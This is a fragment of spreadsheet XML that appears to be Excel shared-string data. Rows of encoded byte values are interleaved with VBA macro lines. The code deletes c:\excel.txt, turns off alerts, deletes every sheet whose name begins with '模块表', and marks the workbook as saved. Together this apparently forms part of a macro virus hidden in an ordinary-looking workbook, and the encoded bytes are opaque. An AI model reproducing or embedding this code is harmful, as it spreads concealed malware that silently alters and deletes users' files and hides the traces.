49 147 12 244 247 168 36 202 43 42 154 7 68 45 150 168 168 124 68 77 129 37 49 71 180 136 136 122 218 62 216 159 163 242 173 106 81 155 10 107 103 94 164 185 81 7 98 19 213 209 62 252 14 108 171 186 170 76 229 201 252 58 53 133 172 62 125 113 145 122 122 186 77 85 167 58 121 162 168 17 245 66 158 136 106 171 90 202 147 50 53 71 205 93 15 44 157 0 124 252 254 215 129 92 222 170 14 74 101 106 1 108 164 41 212 2 158 215 209 162 217 120 86 51 81 227 119 66 67 144 11 129 50 149 87 137 58 175 76 37 142 1 127 29 20 253 122 140 227 119 165 17 134 25 113 178 58 190 169 4 159 40 113 117 81 157 202 209 18 243 219 104 209 145 75 108 41 83 231 2 118 5 69 71 227 152 27 136 249 56 254 181 196 108 177 209 2 131 247 50 178 108 180 58 36 140 178 207 166 146 58 168 208 70 10 230 231 168 163 224 255 209 120 6 41 136 239 221 19 199 38 213 177 200 212 176 136 63 58 137 236 96 195 159 102 194 48 133 189 186 </t>
  </si>
  <si>
    <t>a1:</t>
  </si>
  <si>
    <t xml:space="preserve">48 69 84 201 184 83 154 173 72 44 240 48 21 154 9 218 152 113 16 228 163 104 136 61 200 172 196 153 159 102 3 210 158 100 19 81 1 126 69 224 17 33 190 21 30 94 69 165 184 21 112 229 72 17 60 54 120 246 88 217 247 135 19 50 71 77 95 206 249 70 193 99 2 148 187 136 137 76 218 41 178 17 191 24 194 135 13 220 209 202 77 103 88 29 236 175 87 7 62 107 83 201 88 190 77 29 240 215 171 171 79 23 231 94 207 145 54 168 132 47 83 83 50 201 5 163 201 232 58 52 185 94 166 85 89 120 60 94 104 83 11 139 212 79 209 62 236 212 243 17 135 89 249 17 117 234 28 50 171 118 161 122 213 4 146 77 6 131 7 226 3 159 29 137 51 68 166 148 169 165 54 178 80 45 130 134 56 30 39 19 248 35 241 248 222 122 21 121 143 213 125 64 0 67 21 49 164 216 234 201 105 44 185 199 66 46 162 246 58 135 210 61 53 155 124 74 191 245 60 72 157 55 47 86 212 220 42 139 185 125 172 19 242 186 112 71 153 85 184 80 157 58 145 100 76 130 54 154 183 80 37 185 154 201 207 28 181 160 176 94 45 248 20 249 140 101 232 59 136 41 121 239 113 212 80 150 142 75 42 195 101 3 119 198 184 84 115 164 107 88 174 243 128 67 69 106 1 2 76 161 114 183 63 110 240 56 151 241 248 136 37 135 216 246 199 227 219 22 170 154 248 12 126 50 153 76 222 19 183 237 129 56 27 61 164 179 144 129 149 47 67 29 208 123 203 212 253 241 61 241 210 84 198 221 220 5 156 193 203 188 74 36 33 37 111 133 70 203 216 4 95 238 180 208 47 81 158 57 63 184 188 119 17 194 153 146 254 28 167 181 228 89 85 65 150 175 207 34 167 200 43 131 253 253 113 96 76 81 61 29 81 202 140 241 161 140 117 247 253 241 85 11 113 212 204 73 140 154 133 56 106 94 200 83 102 64 127 95 168 246 199 115 235 172 100 156 216 163 14 254 162 76 205 42 129 37 5 200 32 212 49 66 239 229 217 155 19 191 129 190 102 31 210 127 115 136 254 209 111 173 255 30 129 209 162 13 164 118 164 126 92 6 233 251 227 86 178 7 158 133 73 125 </t>
  </si>
  <si>
    <t>fso.deletefile "c:\excel.txt"</t>
  </si>
  <si>
    <t xml:space="preserve">248 56 148 89 107 213 172 78 252 253 231 142 226 162 28 128 199 3 131 79 197 1 40 147 188 195 40 121 34 218 198 157 74 196 83 241 193 96 157 10 35 93 60 240 70 124 147 133 92 138 3 65 171 58 240 97 255 8 37 170 161 4 96 146 144 133 92 114 218 142 114 169 213 142 61 247 82 254 247 113 202 241 111 132 65 7 164 223 199 79 169 175 232 197 161 219 94 106 72 12 76 77 133 109 116 122 250 122 56 104 236 76 159 110 82 242 54 89 168 236 143 2 154 227 235 222 136 63 75 206 112 254 60 16 103 115 219 193 120 242 148 115 48 174 113 255 64 60 105 254 60 24 63 16 255 7 157 63 31 166 243 39 16 179 51 254 181 196 140 60 127 34 97 230 249 51 29 254 63 172 205 159 155 207 126 254 28 54 10 145 9 14 182 230 230 45 57 214 146 33 253 47 151 217 22 198 223 187 80 211 27 240 244 195 243 77 115 233 65 232 131 7 226 67 231 82 59 179 207 60 240 138 182 98 61 156 174 175 245 181 248 100 139 48 201 118 156 39 193 178 175 12 118 2 22 102 189 121 33 117 45 204 229 152 107 213 172 170 175 215 202 124 147 253 230 212 33 247 124 234 40 141 179 201 46 182 2 197 149 51 79 138 200 80 251 205 227 44 198 90 34 111 218 73 182 178 40 33 95 232 107 106 40 101 3 40 51 70 44 53 115 196 210 249 179 73 57 91 222 114 180 82 59 185 224 12 42 157 77 122 89 41 43 45 85 66 134 110 213 70 46 133 42 222 189 204 111 228 182 94 198 1 161 211 94 103 9 101 195 12 84 159 219 207 242 231 167 250 44 236 214 149 125 22 199 253 36 157 68 178 83 97 66 184 150 35 190 135 173 60 201 128 58 87 86 86 44 147 165 53 194 102 175 146 130 251 161 203 184 236 53 169 92 198 119 185 140 52 78 182 100 219 82 82 199 167 115 227 233 245 169 159 147 76 238 242 133 28 76 99 22 185 47 170 248 36 81 88 196 77 38 81 162 192 86 83 34 125 34 17 64 66 252 164 128 107 35 214 89 109 139 43 34 145 118 246 157 247 78 77 209 72 77 37 46 110 119 145 233 124 133 246 169 116 212 228 142 148 105 254 29 46 </t>
  </si>
  <si>
    <t>Application.DisplayAlerts = False</t>
  </si>
  <si>
    <t xml:space="preserve">98 197 76 187 21 23 172 201 16 20 83 228 98 198 43 242 92 132 227 87 121 54 1 168 81 125 184 96 180 144 164 228 159 78 115 145 9 44 122 4 216 179 22 184 72 22 159 140 29 42 92 159 73 113 145 204 97 133 48 254 216 159 0 147 204 61 71 29 49 217 69 82 248 42 209 29 141 78 249 181 139 88 248 30 41 203 69 50 104 17 85 109 175 108 239 114 203 237 205 130 178 254 39 0 158 1 170 10 184 117 181 34 213 42 182 62 163 151 176 144 30 81 215 47 78 126 207 32 67 139 165 54 21 211 67 46 16 174 38 65 148 220 190 194 19 64 49 233 14 255 20 40 78 31 90 101 119 184 252 148 139 140 97 229 87 68 124 110 69 168 149 165 16 214 122 223 36 83 246 198 112 233 39 46 50 154 101 175 14 70 35 162 187 23 53 125 74 244 212 103 64 33 161 90 87 247 165 46 24 11 154 133 48 213 148 54 228 25 36 53 9 107 4 175 82 33 138 26 109 209 213 191 195 156 126 168 76 2 110 205 56 2 205 53 180 66 61 169 104 43 146 19 237 141 42 66 200 125 159 142 66 34 155 150 240 218 84 200 196 106 210 180 240 25 16 99 37 21 62 223 231 50 178 160 194 183 174 13 176 76 206 114 229 155 122 203 25 205 128 241 117 91 92 132 215 27 66 138 244 190 178 27 33 129 175 126 61 98 130 81 171 60 119 110 64 65 19 122 132 203 110 50 53 38 196 46 175 211 155 38 17 235 233 85 132 191 0 132 52 158 221 198 72 45 69 184 254 168 244 254 45 128 8 161 167 31 168 105 4 54 245 223 8 130 66 186 67 89 200 163 80 175 95 18 125 130 188 161 5 154 139 52 71 4 111 208 45 214 210 168 168 109 3 22 213 210 133 158 96 84 137 62 152 129 49 94 10 76 139 255 96 187 9 67 168 244 116 61 196 82 254 107 229 30 195 186 134 73 200 164 109 128 161 222 126 177 112 251 97 61 139 133 212 198 68 17 47 200 29 190 7 40 34 64 49 66 202 123 71 23 168 100 94 96 202 182 163 136 21 246 139 22 161 71 65 17 123 232 5 172 191 86 146 81 102 131 32 17 229 192 117 138 79 193 199 38 222 97 116 211 10 19 </t>
  </si>
  <si>
    <t>for i=1 to thisworkbook.sheets.count</t>
  </si>
  <si>
    <t xml:space="preserve">130 254 212 109 216 182 66 207 119 86 155 228 85 232 57 116 210 104 240 42 84 95 79 185 25 185 186 198 109 166 116 77 198 54 35 239 74 183 24 19 222 189 194 36 144 122 59 100 204 70 146 169 184 55 72 211 238 6 96 188 110 95 245 203 191 0 81 188 24 65 63 114 231 159 157 64 54 132 155 4 204 81 25 243 251 15 191 79 243 215 54 183 52 173 168 106 9 1 247 82 249 238 102 165 87 20 182 220 140 41 157 130 28 22 196 98 103 251 47 129 34 62 97 35 245 196 119 112 16 9 160 55 63 23 243 137 17 132 38 200 139 110 119 145 137 124 184 33 22 242 8 114 163 191 18 132 44 218 34 209 114 143 129 124 79 130 140 67 210 48 69 17 194 173 229 26 98 141 93 130 44 186 35 17 193 23 202 67 212 27 87 214 52 213 87 44 91 86 83 189 35 27 90 129 79 50 82 251 189 1 148 221 128 38 160 183 143 55 245 29 138 92 227 81 163 239 52 7 175 22 62 58 141 173 28 237 70 124 176 17 15 29 50 181 45 102 155 234 70 242 68 244 110 147 32 7 241 98 189 48 80 248 4 113 53 128 24 63 180 72 82 234 162 119 112 236 193 190 21 125 124 189 169 201 116 46 253 54 100 66 151 86 118 75 49 242 223 75 57 179 254 67 100 128 191 54 216 35 248 96 120 235 108 253 5 242 57 92 35 203 85 146 79 40 232 130 246 216 104 3 8 86 24 202 162 130 220 37 248 28 95 92 99 142 116 126 121 13 194 137 94 189 204 173 4 80 6 226 99 1 45 2 45 222 190 180 162 117 89 69 75 93 67 197 210 154 102 1 169 196 163 182 101 114 176 11 186 234 107 128 9 207 71 21 57 182 102 30 52 219 176 177 119 104 225 247 26 76 76 196 130 111 110 193 217 77 20 167 93 133 136 47 9 43 32 74 110 241 131 1 108 105 61 84 23 236 8 60 159 14 68 83 172 45 68 242 251 97 52 58 254 40 109 123 234 199 28 23 172 70 182 104 39 168 157 55 33 98 18 200 201 134 66 28 127 180 145 69 129 94 140 237 121 253 139 192 1 218 107 105 155 236 108 215 7 252 33 93 151 166 13 6 176 175 122 122 159 109 51 229 129 81 </t>
  </si>
  <si>
    <r>
      <t>if left(thisworkbook.sheets(i).name,3)="</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <charset val="134"/>
      </rPr>
      <t>模块表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t>" then</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">90 134 89 174 209 127 199 127 211 161 54 32 95 177 14 229 134 37 67 184 109 1 246 185 38 1 38 29 175 224 31 131 129 80 180 195 35 245 116 231 254 208 52 230 176 148 173 63 66 220 162 1 73 86 194 208 14 185 178 169 222 68 218 209 78 148 34 26 236 30 109 18 21 26 127 255 235 88 105 135 64 201 182 205 71 208 24 160 35 66 248 61 125 248 49 214 0 209 202 15 96 174 226 53 118 121 221 30 44 118 195 111 17 6 11 244 110 199 58 155 97 57 163 220 124 33 142 125 48 163 6 115 167 155 155 22 162 55 111 196 217 198 45 203 163 98 166 177 28 98 115 157 200 54 111 192 49 107 157 230 113 94 196 60 197 179 153 167 100 14 243 204 155 203 60 165 23 51 207 37 118 230 41 115 48 79 185 115 29 34 4 0 237 207 223 198 124 142 157 186 207 185 235 54 211 44 188 162 82 138 133 125 111 251 76 109 193 136 93 123 31 182 167 15 15 2 233 56 208 120 55 2 195 179 195 29 157 56 199 121 97 82 197 248 129 7 113 136 246 126 63 11 103 90 237 162 195 31 143 152 106 211 18 150 52 35 182 62 73 121 100 163 137 105 8 121 230 235 198 242 168 89 113 203 74 44 130 125 50 120 74 103 33 151 184 220 32 68 173 184 22 34 13 20 112 11 187 97 240 131 199 140 193 12 75 58 215 163 4 71 165 124 243 98 42 42 189 6 171 163 44 20 137 168 54 65 107 146 177 188 13 7 205 253 247 239 62 241 212 135 142 103 61 70 192 185 35 41 80 252 92 82 160 228 249 164 192 188 157 73 129 210 93 73 129 75 94 240 96 119 119 59 58 177 10 29 75 89 2 97 83 222 242 39 173 134 220 93 66 69 212 191 128 10 27 250 221 175 26 249 171 181 211 231 27 127 103 44 4 123 68 45 82 43 119 250 157 164 241 60 32 117 143 253 212 152 39 113 112 139 30 218 109 44 127 155 244 123 7 142 42 199 14 175 177 86 168 2 94 226 141 3 236 249 122 55 161 119 13 112 252 235 186 222 136 236 17 241 206 193 65 119 136 238 114 120 216 84 226 102 247 97 171 37 201 48 51 26 255 250 146 190 55 176 120 136 53 221 18 82 67 106 </t>
  </si>
  <si>
    <t>ThisWorkbook.Sheets(i).Delete</t>
  </si>
  <si>
    <t xml:space="preserve">191 133 53 221 124 112 231 66 40 159 148 195 83 69 230 67 13 218 249 219 98 248 95 65 214 17 7 196 84 65 120 41 252 53 146 6 22 179 148 44 129 88 204 215 204 98 180 211 59 221 45 101 190 26 240 205 37 213 164 30 254 242 33 38 8 27 160 24 113 19 17 54 118 149 224 70 33 198 11 254 90 216 18 201 224 86 144 8 252 137 52 214 13 91 165 32 196 135 233 29 199 164 157 182 197 204 7 180 42 92 252 173 248 224 0 60 139 193 181 39 241 65 134 218 59 224 191 155 132 40 142 65 130 187 182 40 165 31 49 196 244 40 60 126 192 116 6 240 2 95 125 9 82 243 133 109 195 66 53 164 21 160 214 0 23 202 161 158 70 112 43 161 158 145 160 212 144 30 90 6 57 84 78 219 6 33 123 200 26 136 243 210 28 245 80 202 67 177 146 73 239 16 206 236 28 81 66 138 135 241 227 108 57 227 100 18 98 112 102 21 180 126 3 252 181 128 63 10 56 224 166 86 0 30 21 67 222 182 196 22 23 121 133 101 21 240 121 160 44 82 93 67 219 56 6 113 18 228 55 90 56 249 151 145 104 95 39 72 78 45 180 109 53 197 166 10 240 156 7 124 51 172 40 161 141 164 57 240 84 3 220 121 140 138 10 106 105 201 78 173 18 105 241 206 4 21 142 191 89 251 134 104 62 108 47 31 192 16 191 162 109 147 203 156 125 235 82 133 60 207 19 158 35 36 149 179 16 180 123 152 1 110 22 55 244 196 91 123 123 235 236 79 59 147 85 44 24 50 255 186 98 28 201 129 86 15 208 126 188 138 246 217 78 192 86 130 191 78 146 61 162 57 81 85 157 200 125 117 25 85 69 99 246 84 231 194 37 89 62 29 24 139 1 158 92 179 214 65 193 150 141 0 118 47 167 165 171 234 147 63 100 186 35 6 2 65 145 27 151 99 0 223 66 178 88 34 220 223 255 141 79 251 63 0 14 255 95 126 228 92 120 41 175 189 189 117 207 210 250 199 187 199 197 123 182 157 159 167 73 188 246 213 121 212 178 238 172 253 205 196 27 6 231 206 209 123 210 219 79 62 37 220 51 101 122 253 182 192 230 252 237 247 215 247 235 249 245 119 71 182 183 150 </t>
  </si>
  <si>
    <t xml:space="preserve">95 249 174 237 228 150 228 175 192 230 36 89 62 210 52 184 229 220 149 22 149 60 214 172 157 9 165 247 101 227 113 45 73 172 252 169 62 148 69 186 195 189 168 235 229 244 60 48 233 141 131 85 136 22 194 189 26 106 184 83 18 97 216 175 19 242 221 68 233 234 96 136 222 210 208 131 18 129 81 78 47 45 184 189 1 106 47 88 15 139 81 128 214 152 8 215 244 4 21 66 150 19 75 95 22 13 3 94 77 137 170 240 158 42 228 110 73 84 229 151 100 66 174 98 133 45 100 177 164 72 120 125 71 175 122 9 148 246 36 66 65 24 219 99 132 223 152 67 67 168 156 195 15 9 234 21 215 75 225 14 2 195 156 17 150 34 132 92 151 168 42 44 116 19 178 41 17 108 144 0 205 235 97 29 151 8 6 130 8 224 134 4 128 134 152 8 108 185 13 214 129 90 120 89 12 175 198 18 114 119 34 6 24 31 11 1 61 15 36 160 54 11 0 245 9 35 24 243 16 242 116 2 34 218 119 36 228 153 4 65 72 236 179 70 170 28 3 88 47 37 152 181 42 0 203 121 66 246 194 90 155 69 4 21 118 39 151 144 125 137 108 84 51 144 146 89 211 227 21 196 190 139 80 101 186 178 178 226 243 63 161 58 96 85 48 236 40 221 187 142 121 139 157 105 235 113 19 4 11 199 103 158 198 45 41 228 43 221 158 143 169 187 30 120 230 160 35 2 59 167 212 76 77 189 252 51 23 44 241 51 117 21 181 87 121 105 55 166 193 254 54 232 21 38 194 14 42 243 71 69 180 193 240 242 174 190 95 91 251 103 99 29 218 94 211 229 22 99 176 106 205 249 119 220 8 83 173 160 227 248 148 132 223 121 194 240 23 191 15 126 27 219 78 235 192 58 115 112 239 167 135 232 203 30 119 29 195 45 141 118 191 245 142 38 170 220 209 237 164 238 141 27 27 149 36 253 246 47 103 185 72 118 210 218 155 217 4 213 77 130 202 247 22 25 197 180 52 216 229 40 194 218 143 140 245 61 43 114 191 207 88 140 183 87 11 126 119 76 84 214 236 51 178 225 101 99 143 40 60 247 111 6 64 118 249 23 109 138 102 228 226 94 13 173 135 190 117 181 11 186 115 31 </t>
  </si>
  <si>
    <t xml:space="preserve">221 248 76 140 24 59 1 180 62 26 157 89 111 218 56 211 248 49 89 184 233 141 72 145 16 132 70 93 101 218 33 178 148 49 77 184 15 100 129 232 184 14 147 46 71 79 218 178 200 32 70 55 123 90 176 15 183 130 128 98 214 86 179 174 83 146 215 212 227 174 50 232 50 43 254 130 233 168 248 3 106 99 97 197 222 101 112 132 1 254 227 175 76 232 178 20 239 19 70 230 42 119 4 219 43 171 39 105 123 3 185 144 99 209 15 158 50 182 98 244 30 172 176 19 178 141 51 100 163 65 232 166 114 116 209 90 220 206 53 7 114 219 13 242 244 180 63 164 187 200 4 163 72 53 140 98 10 213 26 77 41 65 249 199 13 161 227 21 47 234 112 232 69 112 170 180 235 238 51 31 50 196 60 47 222 106 226 171 14 182 248 227 33 149 104 7 31 184 11 204 20 81 159 164 237 7 87 44 249 164 31 69 191 202 141 23 190 79 222 105 28 75 24 249 223 126 19 91 18 111 120 67 192 247 227 127 49 213 168 39 157 119 183 177 237 172 64 138 4 189 246 9 73 234 88 4 233 243 189 106 218 114 47 241 47 251 43 178 204 27 56 216 102 74 244 6 148 147 208 5 117 45 173 134 238 241 31 104 81 48 216 136 238 16 237 99 155 14 32 174 93 30 45 67 225 71 198 102 182 38 236 134 46 161 13 88 255 177 215 136 103 136 210 142 245 50 12 88 217 195 89 70 185 255 244 91 70 87 74 138 94 183 0 171 211 95 9 106 123 0 58 22 27 57 240 237 143 242 199 177 163 117 121 26 164 135 10 146 182 221 64 255 173 135 13 126 212 7 195 66 244 133 67 166 206 70 227 31 186 213 144 193 149 149 108 248 107 12 160 242 125 101 37 244 233 136 20 70 130 50 10 81 29 131 122 205 165 146 47 38 10 199 114 233 9 4 246 130 70 63 5 52 179 205 144 219 122 33 220 161 4 190 183 95 83 212 248 4 17 50 172 154 130 26 48 61 20 125 240 94 212 103 106 2 78 203 103 94 103 136 177 118 20 85 17 13 40 46 50 145 198 89 73 40 42 213 132 161 56 204 90 40 179 213 2 234 45 6 46 115 145 243 120 24 118 14 190 140 154 22 191 191 </t>
  </si>
  <si>
    <t>Application.DisplayAlerts = True</t>
  </si>
  <si>
    <t xml:space="preserve">124 181 78 183 149 160 122 57 218 221 138 29 93 12 119 86 61 129 250 26 237 204 164 25 245 115 222 152 210 85 141 84 181 184 229 14 65 65 125 205 93 95 160 124 8 78 178 26 49 151 133 14 58 217 204 92 132 152 67 72 211 70 165 6 146 58 178 36 198 66 225 104 164 220 36 79 126 255 177 147 72 161 206 107 193 175 44 63 102 234 96 128 87 139 136 152 7 186 126 182 26 135 156 176 144 133 78 200 151 101 130 24 232 90 240 87 211 112 20 30 179 205 20 23 26 189 45 73 23 186 52 232 251 48 130 60 112 123 188 143 201 102 101 160 199 251 226 197 244 32 69 18 125 167 199 154 15 82 32 186 35 134 3 114 179 34 87 73 225 174 30 170 212 213 7 8 45 238 154 169 200 161 46 207 138 112 16 27 184 255 65 156 185 186 60 171 130 62 97 106 33 10 74 151 7 36 43 34 200 85 238 168 112 252 115 228 11 100 142 176 136 206 185 90 47 195 179 68 6 193 254 18 82 208 229 169 11 202 238 14 119 216 253 200 61 90 175 107 112 203 178 212 253 159 141 26 132 122 169 91 131 176 239 168 137 91 62 105 235 73 68 74 148 188 110 17 21 133 151 93 101 210 230 38 210 54 117 32 131 66 221 158 95 239 64 15 204 190 183 238 198 81 190 190 69 14 134 78 121 144 2 189 29 49 230 24 158 173 144 38 244 110 58 148 148 72 99 228 91 105 73 68 107 254 137 228 146 24 83 184 29 26 27 13 30 227 229 236 137 28 73 92 188 222 203 89 18 126 66 95 147 228 206 96 161 62 134 195 50 218 38 118 60 103 165 175 110 141 161 251 185 11 70 58 166 63 131 152 255 147 191 107 236 246 62 187 211 94 82 108 159 67 108 211 120 190 10 246 246 99 44 227 237 246 18 82 250 79 249 206 185 246 124 59 201 175 154 223 182 106 73 67 3 105 105 211 14 128 109 197 206 54 171 215 57 87 17 137 39 191 177 190 102 70 69 12 22 168 218 32 159 6 107 116 203 117 213 116 253 151 178 177 186 177 111 17 85 61 204 187 182 250 150 190 113 155 250 44 27 170 157 213 164 182 172 218 94 82 53 103 30 169 172 173 152 227 176 59 42 103 204 169 </t>
  </si>
  <si>
    <t>ThisWorkbook.Saved=True</t>
  </si>
  <si>
    <t xml:space="preserve">172 174 153 215 87 93 81 49 175 175 178 164 47 197 185 185 186 239 142 14 153 184 67 51 232 80 68 218 150 6 189 178 20 149 138 252 202 12 107 105 27 111 13 69 251 164 242 185 62 81 204 31 157 213 55 163 124 174 125 70 163 199 178 139 204 168 15 122 100 183 220 123 83 95 21 177 140 229 14 114 100 194 181 86 91 87 108 50 183 21 23 160 137 69 227 230 197 36 167 111 2 234 7 188 54 212 15 252 10 213 3 143 122 250 172 82 159 117 202 143 207 115 254 97 212 182 220 61 227 97 159 86 105 113 112 138 11 53 3 121 149 156 37 101 246 242 125 51 127 190 232 252 74 219 69 149 150 201 27 137 117 143 101 207 81 199 226 107 211 183 162 78 96 202 38 222 121 61 191 164 113 210 141 203 27 39 61 249 195 170 73 69 163 42 39 189 124 94 214 62 238 43 249 175 221 191 73 126 64 176 214 13 127 98 236 142 73 70 226 94 14 49 189 117 144 206 110 0 106 110 26 94 98 74 127 157 85 124 34 197 184 65 68 239 185 67 218 35 105 195 223 191 176 159 219 251 23 103 253 254 131 132 58 29 135 249 253 15 199 57 190 255 145 201 174 109 157 105 253 13 104 61 139 245 223 161 111 125 116 147 208 89 214 159 125 14 244 175 128 167 248 127 218 251 14 184 38 150 111 255 77 40 210 69 69 69 4 141 88 64 20 12 161 163 40 105 64 2 4 5 43 69 65 186 138 160 128 5 69 233 96 5 65 41 86 80 84 138 84 81 138 130 88 174 13 20 225 138 5 123 225 10 138 5 193 130 5 255 51 147 93 8 17 244 234 125 255 247 121 239 253 110 248 28 118 247 59 179 103 103 167 158 115 230 204 44 214 219 243 127 239 253 161 71 151 220 47 188 255 108 64 79 136 254 75 2 175 26 162 160 238 188 186 95 189 170 236 105 50 179 34 109 187 214 126 131 13 49 16 211 144 119 9 13 22 181 231 132 152 108 140 91 123 55 109 62 184 111 61 196 151 139 25 109 59 94 251 204 52 109 122 153 228 160 132 162 213 16 163 133 55 122 13 42 46 99 30 54 185 186 121 239 92 165 99 16 11 45 30 107 165 228 23 69 47 15 124 46 175 128 189 137 </t>
  </si>
  <si>
    <t>End Sub</t>
  </si>
  <si>
    <t xml:space="preserve">224 223 91 103 17 114 218 221 180 48 165 85 90 124 180 245 50 136 25 157 205 110 90 189 60 205 44 235 48 51 97 118 233 160 19 16 27 233 226 219 188 118 113 187 229 134 131 135 159 171 240 190 208 32 22 220 178 249 74 252 35 53 139 228 254 15 156 154 226 219 26 32 70 10 189 221 90 57 166 159 121 137 228 192 218 50 223 134 76 136 121 139 191 60 176 235 162 11 51 218 168 242 241 117 214 123 25 132 149 203 152 229 104 62 182 202 213 107 173 189 48 139 236 8 49 110 53 139 150 44 97 108 30 171 183 83 230 156 206 117 81 148 102 241 251 83 170 94 78 165 31 11 93 63 235 161 105 181 54 196 30 54 100 155 169 239 92 66 47 170 107 223 155 199 75 64 105 118 220 158 226 151 176 167 134 125 48 246 216 243 79 117 201 101 16 107 153 57 242 175 227 19 15 242 210 42 86 235 166 150 188 211 128 88 225 234 39 141 85 254 135 204 66 95 245 55 113 136 120 233 4 49 131 246 71 113 69 247 92 45 43 44 206 184 246 83 77 44 135 216 20 221 171 233 185 77 20 211 125 47 138 84 251 91 223 155 3 10 86 22 126 62 70 10 53 99 41 50 89 84 28 195 164 161 195 161 42 230 142 173 2 228 129 27 143 85 97 179 151 134 78 136 174 200 200 236 15 176 0 16 186 4 115 193 60 49 45 60 54 140 51 162 43 78 95 177 96 74 94 252 213 185 119 229 240 203 156 4 15 147 148 134 115 250 102 68 169 223 80 14 217 39 162 125 204 122 7 125 243 133 11 115 94 163 156 25 23 126 96 87 106 29 213 60 93 204 245 164 67 62 207 10 98 139 238 198 214 85 27 71 89 236 124 249 236 149 130 60 115 23 241 38 10 120 163 17 133 243 77 36 126 122 151 131 103 186 32 83 126 0 74 65 64 215 91 65 78 46 241 151 213 125 149 147 24 81 219 14 253 241 90 234 244 17 136 201 157 142 246 77 156 95 105 118 130 29 167 159 154 58 0 126 233 91 196 203 97 203 173 87 90 103 216 69 207 252 90 118 212 111 57 7 49 222 211 67 107 15 217 167 242 14 113 207 12 189 52 69 100 24 196 238 24 95 48 105 27 199 225 69 110 47 </t>
  </si>
  <si>
    <t xml:space="preserve">44 127 97 31 34 129 242 221 102 244 241 65 143 211 232 5 167 155 55 170 100 200 141 134 152 226 235 7 202 229 123 171 205 163 30 61 201 84 121 52 123 5 196 166 78 139 142 87 25 230 110 157 123 205 101 62 77 117 200 120 136 37 207 184 60 75 206 122 141 101 212 186 148 154 21 173 3 225 62 67 34 211 60 51 14 29 52 11 225 21 110 174 229 101 47 231 236 129 24 99 148 125 210 224 55 20 230 169 130 116 251 108 21 205 131 16 123 22 166 56 145 137 253 73 207 55 138 57 126 68 199 177 17 98 137 167 227 43 18 157 243 76 75 174 165 189 175 27 70 190 11 177 216 136 233 227 247 126 56 197 45 50 60 69 158 116 197 235 17 196 46 205 61 127 212 85 97 145 69 126 213 132 50 183 202 225 129 16 27 21 105 127 155 162 236 195 202 123 59 155 30 183 53 38 12 98 210 147 58 26 74 154 101 76 75 103 172 24 31 236 212 239 14 196 84 207 121 14 14 182 105 97 108 117 86 28 103 106 152 3 191 188 46 242 114 225 124 199 212 13 7 44 179 242 120 49 77 137 107 58 33 22 233 171 120 59 58 92 222 34 239 188 228 224 40 218 27 196 47 64 119 244 177 93 19 54 178 195 199 222 184 59 220 162 30 189 155 113 186 231 142 75 143 242 216 229 39 213 236 63 125 125 247 30 98 121 57 235 70 95 90 60 199 188 220 226 196 214 64 207 22 29 136 69 245 187 22 120 122 209 88 110 134 17 121 148 129 65 117 169 44 24 167 232 210 2 91 39 146 165 177 91 82 221 253 81 165 178 236 149 5 73 70 236 240 214 138 164 5 97 24 170 109 254 30 225 99 100 199 229 113 51 37 101 213 212 12 28 119 161 114 185 161 248 180 221 217 210 124 215 149 119 73 27 111 47 69 121 225 26 39 95 237 211 80 197 60 54 33 60 69 212 41 92 22 98 234 110 105 39 171 93 84 24 91 119 107 74 177 42 3 205 80 91 63 80 234 50 57 122 164 89 129 83 213 232 53 158 233 67 33 150 179 236 201 211 216 231 11 76 163 183 118 222 159 59 96 221 105 136 13 90 125 113 207 230 140 155 244 13 246 139 234 39 222 82 12 7 163 167 180 2 </t>
  </si>
  <si>
    <t xml:space="preserve">106 137 62 216 106 80 99 225 196 147 27 168 179 203 1 2 154 171 52 250 60 66 215 153 35 28 114 165 69 209 153 35 68 73 208 121 214 22 11 196 150 98 194 185 112 17 228 66 9 126 13 58 103 18 108 239 254 64 80 129 83 24 1 32 62 156 54 114 239 10 177 235 10 225 225 33 224 41 36 56 28 120 226 173 155 223 150 96 11 38 238 33 66 186 211 60 4 164 14 110 84 60 22 159 116 181 3 3 19 28 146 198 130 119 152 132 166 74 97 11 13 0 49 225 52 17 5 155 0 82 4 255 123 129 255 63 234 113 96 206 201 215 55 172 27 28 230 100 85 56 222 167 96 37 101 168 62 170 89 219 235 116 92 82 2 88 17 103 250 223 42 60 224 102 11 49 251 176 29 171 162 171 94 152 23 175 148 232 24 16 79 107 71 173 161 78 203 93 250 147 56 107 103 228 197 58 167 195 17 195 1 70 6 162 24 38 228 107 10 97 184 2 178 135 3 8 81 66 252 244 193 137 221 133 32 93 252 35 228 173 201 14 226 62 154 162 64 223 244 96 154 156 215 210 86 84 187 219 39 149 138 55 7 92 180 218 127 133 43 182 210 211 50 72 184 108 46 128 178 145 151 237 174 161 115 26 53 110 58 184 156 103 28 113 27 53 92 107 227 126 212 195 172 121 144 255 167 245 87 134 117 104 180 119 253 213 33 113 123 96 201 195 210 118 7 101 231 134 114 218 234 135 57 205 239 3 225 84 156 43 154 218 132 56 27 253 159 215 149 219 61 223 6 188 165 52 247 111 243 12 248 27 28 21 1 71 251 127 144 202 73 152 85 23 231 190 159 48 247 183 211 252 115 254 112 61 167 2 90 96 235 142 234 127 128 192 104 9 186 24 105 184 202 117 37 106 57 110 224 30 151 94 29 0 192 24 37 173 212 85 131 150 162 216 62 200 141 64 11 164 13 110 130 4 91 148 60 138 225 11 238 95 221 245 4 80 71 165 245 81 239 64 193 198 245 233 96 160 5 222 58 0 77 185 6 128 158 192 15 228 0 12 243 66 53 43 94 99 169 226 195 128 90 203 16 135 138 152 148 180 9 55 65 159 177 126 0 224 58 245 183 185 242 239 81 133 162 162 52 13 113 249 </t>
  </si>
  <si>
